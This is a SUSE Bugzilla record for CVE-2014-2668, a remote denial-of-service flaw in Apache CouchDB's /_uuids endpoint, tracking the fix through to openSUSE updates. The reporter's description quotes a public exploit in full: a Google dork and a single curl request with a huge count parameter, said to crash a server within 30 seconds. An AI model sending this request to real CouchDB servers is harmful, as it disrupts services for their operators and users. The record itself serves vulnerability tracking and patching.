Bug 871111 - (CVE-2014-2668) VUL-1: CVE-2014-2668: couchdb: remote denial of service via /_uuids
(CVE-2014-2668)
VUL-1: CVE-2014-2668: couchdb: remote denial of service via /_uuids
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P4 - Low : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/97449/
CVSSv2:NVD:CVE-2014-2668:5.0:(AV:N/A...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2014-03-31 09:04 UTC by Marcus Meissner
Modified: 2016-12-16 16:20 UTC (History)
4 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2014-03-31 09:04:13 UTC
via NVD:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2668&cid=4

Apache CouchDB 1.5.0 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via the count parameter to /_uuids.



# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0

HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999

TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.



http://www.securityfocus.com/bid/66474/info
http://www.exploit-db.com/exploits/32519/
http://secunia.com/advisories/57572
Comment 1 Vincent Untz 2014-03-31 09:13:51 UTC
Nanuk: could you handle that bug?
Comment 2 Swamp Workflow Management 2014-03-31 22:00:20 UTC
bugbot adjusting priority
Comment 3 Nanuk Krinner 2014-04-01 14:39:02 UTC
Fix submitted to server:database: https://build.opensuse.org/request/show/228439

Fix submitted to Devel:cloud:Shared:SP-3: https://build.suse.de/request/show/35326

Fix tested and works within our Cloud.
Comment 4 Alexander Bergmann 2014-04-04 09:24:16 UTC
Nanuk: please submit an openSUSE:12.3 and openSUSE:13.1 maintenance update.

We will put the Cloud update onto our planed update list and fix it with the next couchdb update.
Comment 5 SMASH SMASH 2014-04-04 11:35:14 UTC
Affected packages:

SLE-11-SP3-PRODUCTS: couchdb
SLE-11-SP3: couchdb
SLE-11-SP2-PRODUCTS: couchdb
Comment 6 Nanuk Krinner 2014-04-04 13:50:54 UTC
I created the maintenance requestes 229032 and 229034
Comment 7 Swamp Workflow Management 2014-04-15 10:04:25 UTC
openSUSE-SU-2014:0526-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 871111
CVE References: CVE-2014-2668
Sources used:
openSUSE 13.1 (src):    couchdb-1.3.0-2.4.1
openSUSE 12.3 (src):    couchdb-1.2.0-6.4.1
Comment 8 Marcus Meissner 2016-12-16 16:20:10 UTC
the cloud products have 1.6.1 or later. fixed